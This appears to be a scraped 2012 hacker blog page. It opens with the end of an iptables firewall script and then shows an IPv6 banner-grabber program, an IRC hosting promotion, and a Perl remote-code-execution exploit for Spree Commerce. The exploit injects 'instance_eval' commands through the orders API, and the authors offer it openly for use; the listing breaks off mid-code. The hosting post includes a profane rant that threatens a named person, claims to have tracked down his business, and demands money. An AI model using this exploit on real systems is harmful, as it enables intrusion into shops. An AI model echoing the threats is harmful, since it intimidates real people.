"${IPTABLES}" -A REJECTLOG -j ${LOG} ${RLIMIT} --log-prefix "REJECT "
"${IPTABLES}" -A REJECTLOG -p tcp -j REJECT --reject-with tcp-reset
"${IPTABLES}" -A REJECTLOG -j REJECT
echo "Generated chains: ACCEPTLOG, DROPLOG, REJECTLOG"

# setup local communication
"${IPTABLES}" -A INPUT -i ${LO_IF} -j ACCEPT
"${IPTABLES}" -A OUTPUT -o ${LO_IF} -j ACCEPT

if [ -n "${DMZ_IF}" ]; then
"${IPTABLES}" -A INPUT -i ${DMZ_IF} -j ACCEPT
"${IPTABLES}" -A OUTPUT -o ${DMZ_IF} -j ACCEPT
echo "Permit all traffic on ${DMZ_IF}"
fi

# disable ports explicitly
for port in ${PORTS_TO_DISABLE}; do
"${IPTABLES}" -A INPUT -p tcp --dport ${port} -j DROPLOG
echo "Disabled input port ${port} on ${NET_IF} (tcp) (DROPLOG)"
"${IPTABLES}" -A INPUT -p udp --dport ${port} -j DROPLOG
echo "Disabled input port ${port} on ${NET_IF} (udp) (DROPLOG)"
done

if [ -n "${KILL_PORT_SCANNING}" ]; then
echo "Killing port scanning attempts on ${NET_IF}, against port ${PORT_SCANNING_PORT}, ban seconds: ${PORT_SCANNING_SECONDS}"
"${IPTABLES}" -A INPUT -i ${NET_IF} -m recent --name portscan --rcheck --seconds "${PORT_SCANNING_SECONDS}" -j DROP
"${IPTABLES}" -A FORWARD -m recent --name portscan --rcheck --seconds "${PORT_SCANNING_SECONDS}" -j DROP

# Once the day has passed, remove them from the portscan list
"${IPTABLES}" -A INPUT -i ${NET_IF} -m recent --name portscan --remove
"${IPTABLES}" -A FORWARD -m recent --name portscan --remove

# These rules add scanners to the portscan list, and log the attempt.
"${IPTABLES}" -A INPUT -i ${NET_IF} -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j LOG --log-prefix "Portscan(host_destroyed): "
"${IPTABLES}" -A INPUT -i ${NET_IF} -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j DROP

"${IPTABLES}" -A FORWARD -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j LOG --log-prefix "Portscan(host_destroyed): "
"${IPTABLES}" -A FORWARD -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j DROP
fi

# UDP
for port in ${UDP_PORTS_INCOMING_ALLOW}; do
"${IPTABLES}" -A INPUT -p udp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A OUTPUT -p udp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing UDP incoming traffic on ${port} on ${NET_IF} (ACCEPT)"
done
for port in ${UDP_PORTS_OUTGOING_ALLOW}; do
"${IPTABLES}" -A OUTPUT -p udp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A INPUT -p udp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing UDP outgoing traffic on ${port} on ${NET_IF} (ACCEPT)"
done

# TCP
for port in ${TCP_PORTS_INCOMING_ALLOW}; do
"${IPTABLES}" -A INPUT -p tcp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A OUTPUT -p tcp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing TCP incoming traffic on ${port} on ${NET_IF} (ACCEPT)"
done
for port in ${TCP_PORTS_OUTGOING_ALLOW}; do
"${IPTABLES}" -A OUTPUT -p tcp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A INPUT -p tcp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing TCP outgoing traffic on ${port} on ${NET_IF} (ACCEPT)"
done

# Timed ports
for port in ${TIMED_PORTS}; do
# TCP
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --set
# log before TIMED_PORTS_HIT_COUNT
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount $((${TIMED_PORTS_HIT_COUNT}-1)) -j LOG
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount ${TIMED_PORTS_HIT_COUNT} -j DROP
echo "Setting up timed port feature on ${port} on ${NET_IF} (tcp) [seconds:${TIMED_PORTS_TIMER_SECS}|hit_count:${TIMED_PORTS_HIT_COUNT}] (DROP)"
# UDP
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --set
# log before TIMED_PORTS_HIT_COUNT
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount $((${TIMED_PORTS_HIT_COUNT}-1)) -j LOG
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount ${TIMED_PORTS_HIT_COUNT} -j DROP
echo "Setting up timed port feature on ${port} on ${NET_IF} (udp) [seconds:${TIMED_PORTS_TIMER_SECS}|hit_count:${TIMED_PORTS_HIT_COUNT}] (DROP)"

done

# ignore microsoft ports?
if [ -n "${IGNORE_MICROSOFT_SHIT}" ]; then
"${IPTABLES}" -A INPUT -p tcp -m multiport --dports 135,137,138,139,445,1433,1434,3306 -j DROP
"${IPTABLES}" -A INPUT -p udp -m multiport --dports 135,137,138,139,445,1433,1434,3306 -j DROP
fi

# ICMP TYPES
"${IPTABLES}" -N RELATED_ICMP
if [ -n "${ALLOW_SANE_ICMP}" ]; then
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp -m icmp -m limit --limit "${ICMP_PACKETS_PER_SECOND}/second" -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type destination-unreachable -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type time-exceeded -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type echo-reply -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type echo-request -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type parameter-problem -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -j DROPLOG
echo "Allowing sane ICMP, only accept some reliable ICMP packets"
elif [ -n "${FUCK_ICMP_I_DONT_NEED_IT}" ]; then
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
echo "Ignoring all ICMP traffic"
fi
ignore_icmp_broadcast="0"
if [ -n "${IGNORE_ICMP_BROADCASTS}" ]; then
# ignore broadcast requests
ignore_icmp_broadcast="1"
fi
echo "Ignoring ICMP echo broadcasts"
echo ${ignore_icmp_broadcast} > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

# Rate Limit RST packets
if [ -n "${RST_PACKETS_PER_SECOND}" ]; then
"${IPTABLES}" -A INPUT -p tcp -m tcp --tcp-flags RST RST -m limit --limit "${RST_PACKETS_PER_SECOND}/second" --limit-burst 2 -j ACCEPT
fi

# make it even harder to multi-ping
"${IPTABLES}" -A INPUT -p icmp -m limit --limit 1/s --limit-burst 2 -j ACCEPT
"${IPTABLES}" -A INPUT -p icmp -m limit --limit 1/s --limit-burst 2 -j LOG --log-prefix PING-DROP:
"${IPTABLES}" -A INPUT -p icmp -j DROP
"${IPTABLES}" -A OUTPUT -p icmp -j ACCEPT
# Drop all fragmented ICMP packets, malicious
"${IPTABLES}" -A INPUT -p icmp --fragment -j DROPLOG
"${IPTABLES}" -A OUTPUT -p icmp --fragment -j DROPLOG
"${IPTABLES}" -A FORWARD -p icmp --fragment -j DROPLOG
# Allow all ESTABLISHED ICMP traffic.
"${IPTABLES}" -A INPUT -p icmp -m state --state ESTABLISHED -j ACCEPT ${RLIMIT}
"${IPTABLES}" -A OUTPUT -p icmp -m state --state ESTABLISHED -j ACCEPT ${RLIMIT}
# Allow some parts of the RELATED ICMP traffic, block the rest.
"${IPTABLES}" -A INPUT -p icmp -m state --state RELATED -j RELATED_ICMP ${RLIMIT}
"${IPTABLES}" -A OUTPUT -p icmp -m state --state RELATED -j RELATED_ICMP ${RLIMIT}
# Allow incoming ICMP echo requests (ping), but only rate-limited.
"${IPTABLES}" -A INPUT -p icmp --icmp-type echo-request -j ACCEPT ${RLIMIT}
# Allow outgoing ICMP echo requests (ping), but only rate-limited.
"${IPTABLES}" -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT ${RLIMIT}
# Drop any other ICMP traffic.
"${IPTABLES}" -A INPUT -p icmp -j DROPLOG
"${IPTABLES}" -A OUTPUT -p icmp -j DROPLOG
"${IPTABLES}" -A FORWARD -p icmp -j DROPLOG
echo "Configured stricted ICMP rules"

# explicitly drop invalid incoming/outgoing traffic
"${IPTABLES}" -A INPUT -m state --state INVALID -j DROP
"${IPTABLES}" -A OUTPUT -m state --state INVALID -j DROP
# If we would use NAT, INVALID packets would pass - BLOCK them anyways
"${IPTABLES}" -A FORWARD -m state --state INVALID -j DROP
echo "Dropped all INVALID incoming/outgoing traffic"

# PORT Scanners (stealth also)
"${IPTABLES}" -A INPUT -m state --state NEW -p tcp --tcp-flags ALL ALL -j DROP
"${IPTABLES}" -A INPUT -m state --state NEW -p tcp --tcp-flags ALL NONE -j DROP
echo "Made port-scanner life harder"

if [ -n "${SYN_FLOOD_PROTECTION}" ]; then
"${IPTABLES}" -N SYN_FLOOD
"${IPTABLES}" -A INPUT -p tcp --syn -j SYN_FLOOD
"${IPTABLES}" -A SYN_FLOOD -m limit --limit 2/s --limit-burst 6 -j RETURN
"${IPTABLES}" -A SYN_FLOOD -j DROP
echo "Made SYN packets life harder (setting 2/s limit, 6 burst packets thresholds)"
fi

if [ -n "${DROP_IANA_IPS}" ]; then
"${IPTABLES}" -A INPUT -s 0.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 2.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 5.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 7.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 10.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 23.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 27.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 31.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 36.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 39.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 42.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 49.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 50.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 77.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 78.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 92.0.0.0/6 -j DROP
"${IPTABLES}" -A INPUT -s 96.0.0.0/4 -j DROP
"${IPTABLES}" -A INPUT -s 112.0.0.0/5 -j DROP
"${IPTABLES}" -A INPUT -s 120.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 169.254.0.0/16 -j DROP
"${IPTABLES}" -A INPUT -s 172.16.0.0/12 -j DROP
"${IPTABLES}" -A INPUT -s 173.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 174.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 176.0.0.0/5 -j DROP
"${IPTABLES}" -A INPUT -s 184.0.0.0/6 -j DROP
"${IPTABLES}" -A INPUT -s 192.0.2.0/24 -j DROP
"${IPTABLES}" -A INPUT -s 197.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 198.18.0.0/15 -j DROP
"${IPTABLES}" -A INPUT -s 223.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 224.0.0.0/24 -j DROP
echo "Dropped all IANA-reserved IP ranges"
fi

# kick off identd quick
if [ -n "${KILL_IDENTD}" ]; then
"${IPTABLES}" -A INPUT -p tcp -i ${NET_IF} --dport 113 -j REJECT --reject-with tcp-reset
echo "Dropped identd request completely on ${NET_IF} (REJECT)"
fi

if [ -f "${CUSTOM_RULES_FILE_POST}" ]; then
source "${CUSTOM_RULES_FILE_POST}"
fi

# close both TCP and UDP
iptables -A OUTPUT -j REJECTLOG
iptables -A INPUT -j REJECTLOG
iptables -A FORWARD -j REJECTLOG

enjoy some protection!

xd

comments: 0 » tags: , , , , ,

[IPv6 Stuff]: IPv6 banner grabber… ofcourse this will also get you the ipv4…. thx to r0t0r for this 1

Posted on 19th April 2012 in Codes, Exploits, Papers

Awesome code! written by a 13yr old, or well, when rotor was a young tadpole :P ~~

Thanks mate, this is definately going into the IPv6 toolkit ill be releaqsing soon on dd0s.ucoz.com or on bsd-demons.com, anywhere who will have me :0

Love the code, love the reasons why it was made… remember what this is for, grabbing the banner from the cisco modem if it is using it, (usually most hosters do..) , and then you would have ipv6 and ipv4 addys… enjoy and thx to rotor but, i will possibly try improove on this.. *TRY*

xd


/*
* c1zc0-cb4n6.c - ipv6 banner grabber
* by rotor  || bsd-demons.com

* stolen for my toolkit by xd :P ~ love ya mate!

* greetz to haxnet,hacked and fuck icer in the ass . and oh, did i forget krashed, ye fuck u to bitch.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

void usage(char *nme);
int main(int argc, char *argv[]) {
int sock;
struct sockaddr_in6 target;
struct hostent *hostname;
char buff[1024];
if (argc < 3) {
usage(argv[0]);
}
printf("%s %s\n", argv[1], argv[2]);
if (( sock = socket(AF_INET6, SOCK_STREAM, 0)) < 0 ) {
printf("error creating socket\n");
exit(0);
}
memset((char *)&target, 0, sizeof(target));
if ((hostname = gethostbyname2(argv[1], AF_INET6)) == NULL) {
printf("error gethostbyname2\n");
exit(0);
}
target.sin6_port = htons(argv[2]);
target.sin6_family = AF_INET6;
memcpy((char *)&target.sin6_addr, hostname->h_addr, hostname->h_length);
if ((connect(sock,(struct sockaddr *)&target,sizeof(struct sockaddr_in6))) < 0) {
close(sock);
exit(1);
} else {
read(sock,&buff,910);
printf("%s",buff);
return(0);
}
}

void usage(char *nme) {
printf("%s <Host> <Port>[TRY 23]\n", nme);
exit(0);
}

and it will not end until everyone has abilitys to grab IPv4 from IPv6 , there will be NO *hiding*. thx.

XD

comments: 0 » tags: , , , , , , ,

LINUX HOSTING/IRC/ANTI-DoS NETWORK ~ GLOWSHELLS.NET IS FINALLY REOPENING!

Posted on 26th March 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

YEP FOLKS IT IS TRUE…

JUST WAITING ON FINALISING 2 OF THE DEDIS/COLOS AND ARE UP! THIS IS VERY AWESOME NEWS FOR ANYONE WHO STILL CARES FOR IRC!

YOU CAN BELIEVE IT GLOW WILL BEAT ANYONE,OFFER GTCOMM/STAMINUS/HOSTVIRTUAL AND ANOTHER UNNAMED COMPANY FOR ALL HOSTING/INCLUDES SOME WEB HOSTING EVEN IN SOME SPECIAL CASES IF THATS WHAT IS WANTED THEN GLOW WILL DOIT, IPV6 AND IPV4,THE GTCOMM BOXES ARE IRC/SHOUTCAST/IRCD/ANYTHING-YOU-WANT-ON-IRC BOXES AND, AT MOMENT IN MIDDLE OF PURCHASING THE DEDIS, AND, THE COLO BOX :D

REALLY GLOW COULD IOPEN AN HAVE OPENED AGES AGO, BUT, THEY JUST WAITED TO GET SOME DECENT IPV4 BACKBONES..SO I GUES THEYRE USABLE BUT, THEYRE JUST GOING TO ACTUALLY COMPETE, SOON…WICH WILL BE GREAT FOR EFNET.. AS, IT NEEDS THIS TYPE OF CO.

SOME MEMBERS WHO HAVE BEEN WITH US FOR AWHILE, WILL REALLY BE ADMINISTRATING THNGS, ALTHO, IT WILL BE ONLY THE SAME OWNER AS BEFORE *MOUSE_*WHO WILL BE HANDLING THE MAIN THINGS.

MOST OF IT THEN, WILL HAVE AN ADMIN OR ONE AND ONE CO ADMIN  PER BOX WICH WILL BE ON CALL 24/7 AND IF NOT YOU GET 1MONTH REFUND, YEP THATS THE TRUTH, IF YOU ENTER, AND, ARE CUSTOMER, AND ARE NOT HELPED WITHIN, 15MINUTES OF YOUR CHANNEL STAY, THE MONTH OR, A VHOST, SOMETHING, IS AUTOMATICALLY AND MAGICALLY, FREE!!! CANT BEAT THAT FOR SERVICE,ATLEAST YA KNOW IT GONNA BE GOOD!

SINCE THE BOXES ARE IN USA/CANADA/FRANCE/NETHERLANDS/SINGAPORE ,WE DECIDED TO MAKE 100% UPTIME BOXES,AND THAT IS SIMPLY USING ONE GTCOMM ADDY, FOR IRC OFCOURSE, WICH SITS ON A 4000GBPS ANTI D0S NETWORK.IT IS THE BEST GLOW IS ABLE AND CAN DO AND IT IS ALSO THE MOST EXPENSIVE NETWORKING, AND REQUORES VERY HIGH ID FOR JUST AX, IS THE MOST EXPENSIVE ROUTE TO TAKE FOR ANY SERVER SETUPS I HAVE SEEN… THIS SEEMS LIKE A ROBUST SERVICE AND, BOASTING ALREADY 400 VHOSTS JUST IN IPV6, WICH HALF ARE NOT EVEN TURNED ON APPRENTLY..MEANING, THEY HAVE OMUCH, THEY REALLY NOW, JUST WANT TO MAKE IT SHARED AND, FOR THOSE WHO WANT 100% UPTIME WRAITH BOTPAX ETC, WELL, HOW CAN YA BEAT, A LOGIN WICH HAS 4 BOXES IN 4 COUNTRIES!! HAHA! YA CANT, IT IS PERFECT, YOU CONTROL THEM, YOU HAVE 100% CONTROL.. SO, YOU GET A 100% AWESOME PRODUCT IN THE END!!! IT IS AWESOME FOR ANYONE HOSTING WRAITH, AND JUST NOW AS IT IS ON THE VPS GTCOMM, IT IS ALREADY HOSTING VERY EASILY, OVER 5-6 PEOPLE AND, THATS WITH OVER 30 WRAITHS NOW..AND NOT ONE BIT OF LAG.

ALTHO THERE WILLBE A COLO BOX THIS WONT BE OPENING FOR ATLEAST ONE MONTH BUT THE DEDIS WILL OPEN THIS WEEK,AND THE VPS IS ACTUALLY UP,IS FINE FOR HOSTING SO GLOW HAVE ALREADY BEEN NOW ACEEPTNIG NEW PEOPLE WHO  ARE SIMPLY FEDUP WITH ONE BOX/LOCATION AND/OR, SIMPLY KNOW THE DEICATION GLOWSHELLS HAS ALWAYS HAD WITH EFNET.

AS I UNDERSTAND IT WILL BE USING UNDERNET/AUSTNET/EFNET/DALNET/LCIRC/RIZON AND MOST COVERED NETWORKS WHO, WELL I ASSUME THOSE WERE OLD PLACES USED..

 

I KNOW FOR AUSSIES THIS IS ESPECIALLY COOL, AS ONE OF THE ADMINS IS AN AUSSIE, AND, HE IS NOT HALF BAD WHEN YOU ACTUALLY ARE NOT CALLING HIM AN A**E ETC..

 

ANYHOW FACT IS, GLOWSHELLS HAS AND ALWAYS WILL BE LIKE NO-OTHER, AND AT MOMENT IF YOUR INTERESTED IN ANYTHING THEN, HEAD TO EFNET IRC IRC.EFNET.ORG AND JOIN #GLOWSHELL-SUPPORT AND SIMPLY WAIT AND, WELL IM JUST WAITING TO SEE MOUSE OPPED AGAIN WHERE SHE SHOULD BE :D

 

I THANK PEOPLE ON EFNET, SPECIALLY SOME LIKE, RFS,CYPHER,FUZION,GIZMORE/WECHALL CHALLENGES,SERH,R0X0R,LORDNIKON,D3MON AND EINS AND EVEN JIMIGJ! HECK, YOU ALL HAVE SOMETHING UNIQUE IN SOME WAY…AND, I WILL BE SURE EVEYONE OF YOU IS HELPED…TALI FOR ALL YOUR HELP WITHOUT HARDLY KNOWING ME, WITH THE GTCOMM FAKE CHANNELS LOL)… AND, FUCKS TO ICER AND KRASHED, AND, YOU BOTH KNOW WHY, YOUR FUCKING BOTH BEEN BUSTED, BOTH HELPIN EACH OTHER, AND PEOPLE ARE STILL GETTING BUSTED…NOW, SINCE I HAVE REPORTED MR KRASHED TO GTCOMM, HIS DDOS HAS STOPPED.AND, I STILL DONT EVEN KNOW WHY HE DID NOT SIMPLY, TALK TO ME, LIKE HUMANS DO.

ANYHWO THINK HARD AND TALK FAST ARSEHOLE… BECAUSE, YOUR THE ONLY SOUR GRAPE IN MY MOUTH.

NOW, AS I WAS SAYING, ENJOY THE RETURN OF GLOWSHELLS AND BE NICE AS ALWAYS! HA!

DRU / XD / WORLDWIDE / KRYPTIK / AKA TEAM 0X90 , YEA, BITCHEZ, THE REAL DEAL HAS NEVER BEEN SO IN YA FACE.

 

NOW READ ON…

 

AND ON THE SOUR NOTE:

AS FOR ICER, YOU HAD A PACT WITH SOMEONE TO MAKE SOMETHING, YOU KNOW, SOMETIMES PEOPLE RELY ON THOSE FUNDS,A ND, WERE OF THE THOUGHTS THAT PERHAPS, YOU WERE IN NO PORBLEMS AS, YOU HAD NOT SAID ANYTHING AND, ASSUMED, EVEYTHING WAS GOING FINE, BUT, AS YOU SAW, IT WAS, ABIT OF DISTRUST ON ONE SIDE BUT, YOU HAD THE CHANCE TO TALK TO THE WEB DESIGNER AND INSTEAD YOU GO HAND THE MONEY TO SOME FUCKING YANKEE WHO PROLLY DOESNT NEED IT.

WELL YOU WILL PAY 200X 10, ATLEAST FOR THAT INSULT YOU SHIT HEAD.

AND NO, I DONT THINK YOUR A *FED* BUT, I DEFINATELY WONDER WHY YOU WOULD ALLOW THIS KRASHED FELLOW, WHO IS A KNOWN HBI SNITCHER, TO HAVE SOMUCH DAMNA XCS TO THE BOTS AND, EVEYTHING IT SEEMS ABOUT YOUR MAGICSHELLS FILTH COMPANY..AND OH FUNNY BUT, WHEN I INVESTIGATED THE IPS, I FOUND OMETHING FUNNY…YEA…AND, I WONT MENTION IT HERE BUT LETS JUST SAY, SHAME ON YOU FOR ALLOWING ANYONE TO RUN B OTNET FROM YOUR SHIT YOU MAGGOT. AND REMEMBER WHERE YOU LIVE, AND THEN WHY THEY ARE SO COCKY AND WHERE THEY LIVE.

JUST REMEMBER, I AINT A FUCKING CRIPPLE MOTHERFUCKER, YOU BETTER FIX THINGS VERY DAMN FAST ABOUT THAT 200 BUX WICH WA MEANT TO BE HEADED MY WAY, AND, THATS BUSINESS YOU CALL IT, TO USE ME, AS A GO BETWEEN, SO, I ASSUME YOU DONT SPEAK TO YOUR BOSSES THEN ? YOU JUST SEND IN A COFFEE BOY AND ASK HIM TO ASK THE BOSS YES / COZ YOU SAID, THATS HOW YOU DO BUSINES… AND, AS I SHOWED YOU, AND WILL KEEP SHOWING YOU, IT IS NOT HOW I DO MY BUSINESS, ASFAR AS I SEE IT, IM OWED 200BUX, AND, SURE, YOU CAN HAVE WHATEVER DEIGN YOU WERE ALREADY THINKING, OR SIMPLY, COP THE FINE, WICH IS MORE FUN FOR ME! BELIEVE ME ARSEHOLE, YOU OWN A SHITTY LITTLE INT CAFE I ALREADY TRACKED DOWN, NOW YOUR EVEN CLOSER TO ME THAN EVER…AND, YOU THINK I WONT USE YOUR CASH AGAINST YOU STUPID. WHERE YOU THINK THE PAIN IS GREEK ? EH, ITS ALWAYS IN THE PCKET.. ASK KCOPE, HE HAS NO PCOKETS THANKS TO HIS FUCKUP IN 2K9… AND STILL, WILL NEVER, EVER BE ACCPETED,EVEN IF HE MADE A REMOTE ROOT FOR EVRY OS IN EXISTANCE AND, I WILL BE SURE TO MAKE YOUR REP THE SAME BITCH.

IT IS NOT HARD AND AS I SAID, I JUST HAVE TO SHOWUP TO YOUR FUCKING *ANYWHERE* I LIKE, COZ, IT IS A PUBLIC FUCKING WORLD…AND, SPEAK NICELY TO YOU :)

HEY, I DID NOT SAY ANYTHING ABOUT BEATINGS ETC… I JUST SIMPLY MENTIONED, YOUR PRIORITYS, YOUR WANTS AND LOVES, AND, HOW EASILY THOSE, CAN BE USED AGAINST PEOPLE NOWDAYS AND ALWAYS DAYS.

comments: 0 » tags: , , , , , , , , ,

[Exploitz]: Spree commerce Remote Code Execution by xd and peanuter/darpa (Sponsored by EFNET :P~~) ~ Enjoy!

Posted on 15th March 2012 in Codes, Exploits

Well, since it is only a few months old now, and, we dont agree on things like, automating the scanner to *auto root* etc, BUT, we did make it so, it can run, with either infile (ip list) and, then th, it will kinda not be ready to make autorooting.. but, i guess this is a BIG ass bug yes..


#!/usr/bin/perl -w
# 01-21-2012
# Spreetime (r00t time) RCE exploit coded by

# xd / HaqNET (#Haxnet@EFNET) and peanuter / darpanet (#darpa@irc.darpanet.org)

##Spree Commerce Remote Code execution exploit and Options~
# greetz: to those who deserve them, all my friends
# from haxnet... the goods ones

#Greets: ac1db1tch3z <3 , all the hackerz on efnet, my channel specially, and the cool dudes and @ps in it,

#Mouse_ , Cypher- , bysin , l3th4l (smashthestack.org), Jason/zx2c4 , killerw0rm , bakO , 2Dcube , gaby, ALL

# albanian hax0rs! love yas! and evey biker around the net, hey, yea, we have some prescence here now!

#Yes ofcourse it is for money! what else would i be sittin here writin this sht for! cmon mate..

#and, even old notprix,the magician who appears, talks abit of bs, then disapears! hha :P  joking mate..

#I could not fit all the people really, there is to many, but, ofcourse the companys who help me to, Host Virtual

#Hosting 2 of my VPS, both in AWESOME EU countries where the standard is 100mbit and, it goes upto and into 400gig/s! Nice damn backbone and love the suppt.

# My affiliation there, would help you greatly: http://www.vr.org/aff.php?aff=551

#Also great box with Gtcomm: GloboTech Communications:
#www.gtcomm.net , USE Referral ID 5039 ,and basically helps me, and, you can even then be added faster, as usually are coming through a trusted/verified user,

#i dont know howmuch it really matters,but atleast shows them you have seen and, watched theyre ad or just been told, like this yes, ina  fucking exploit!

# and 3 to fahmad / server4sale ,for his help with, and donated Dedicated box, wich is a Staminus one and, rather nice, i mean, this is one NICE guy with a huge

# heart, and, i admire him.. also LordNikon, i admire also, when he would stop changing his midn that is :s

#Now, ill let you to go have some phucking phun eh?

#thx to r0x0rel for pointing out the bugz in the first copy and ofc to the rest of haxnet....cheers!

# UNITED WE STAND, AONE , WE FALL! Yes, it is not worded the right way, thats coz, i like to be owiginwal.

#On behalf of the deceased/zombies and vampires, i think usa is now ready to tackle you guys! be careful now, your trolling for brain matter!

#peace to everyone, who i have pissed off lately..and, hopefully, you guys and i can just, chat things out and be done with the ctrap..seriously, i dont need it..and,

#i usually dont like to hand out exploit code like THiS ,but, i guess why not.. it was, there anyhow..

#To ALL troops stationed in afghanistan,pakistan,wherver other mitia advantageous points, well, go home. seriously, your fighting a war you simply will NOT win.

#Sorry that, the shitty governemts, have, been so, great with this, i mean sending mentally sound mass murdereng seargents in, is not theyre best move :s

#unfortunately for those living there, thats life...and, i can nly wish, that everyone is, at peace... or, atleast stoned ok?

#Now, it is time for my injections.. ak im late...see what happens >?

# XD coz BITCH IM WORLDIWDE

use strict;
use warnings;
use IO::Socket::INET;
use Getopt::Std;
use Storable;
getopt('cfdthlg');  ## here is the options.. you CAN remove thi, and set it to JUST scan single ip or,

## add in the scanning for/per subnet..and should be easy as! Ask ZmeU ,hes pretty cool wit that stuff! (GREETZ!)
sub Usage {
print "perl $0:\n"

print "These are your Options:\n"
. "   -c Command    - Issues command with parameters ..\n"
. "   -f Filename   - Uploads file to dir ..  (/tmp by default) ..\n"
. "   -d Directory  - Specify dir to upload file to .. (/tmp by default) ..\n"
. "   -t Target     - Ip Address or Hostname/Domain\n"                          ## hence,we decided using this method.is very easy to add www-mechanize here.and maybe

##GOOD ForkManager for it,also a subnet setup,also it can scan -a/-b/-c if added in codeit..
. "   -l Load       [Load Pre-Compiled Command List using -g]\n"
. "   -g Generate   [Generate Pre-Compiled Command List]\n"
. "   -h Help\n"
. "/t/t_-*Another HaqNET / Darpanet Production*-_";
exit(0);
}

our ( $opt_c, $opt_f, $opt_d, $opt_t, $opt_h, $opt_l, $opt_g );
Usage() unless $opt_c and $opt_t or $opt_f and $opt_t or $opt_l and $opt_t or $opt_g;
#Generate Pre-Compiled Command List (ie in file put uname -a ; id) etc..
if ($opt_g) {
print "-> What would you like to name the commands file: ";
my $filename = <STDIN>;
chomp $filename;
my ($command, @command, $command2);
while () {
print "-> Enter command(s) [done to finish]: ";
my $command2;
$command2 = <STDIN>;
chomp($command2);
if ($command2 =~ /done/) {
last;
}
my $command .= $command2;
}
my $commands = {
'commands' => [ @command ],
};
store(\$commands, $filename);
exit(0);
}
#Single command issue
if ($opt_c) {
#get command from console
my $cmd   = $opt_c;
my $issue = 'cmd';
#send command to Build_Buffer
my $buffer = Build_Buffer( $issue, $cmd );
#send attack to socket
attack($issue, $buffer);
}
#Single File Upload
if ($opt_f) {
open( File, " < $opt_f " )
or die(" [-] Unable to open (ie: file.pl you just added to it): $opt_f\nError : $1 ");
my @file = <File>;
chomp @file;
foreach my $line (@file) {
my $issue = 'file';
#send line to Build_Buffer
Build_Buffer( $issue, $line );
}
}
#Stored Command List
if ($opt_l) {
my $Stored_Commands = retrieve("$opt_l");
foreach  my $line ($Stored_Commands->commands) {
my $issue = 'commands';
#send commands to Build_Buffer
Build_Buffer( $issue, $line );
}
}

sub Build_Buffer {
my ($cmd_or_file, $line) = @_;
$line =~ s/\s/\%20/;
my $payload = undef;
#design payload
if ( $cmd_or_file =~ /cmd/ ) {
my $payload =
'/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. $line
. '%60end';
}
if ( $cmd_or_file =~ /file/) {
if ( $opt_d ) {
my $directory = $opt_d;
} else {
my $directory = '/tmp/';

#my $directory2 = '/proc/self/environ/;    ## this is where id be headed ;)
}
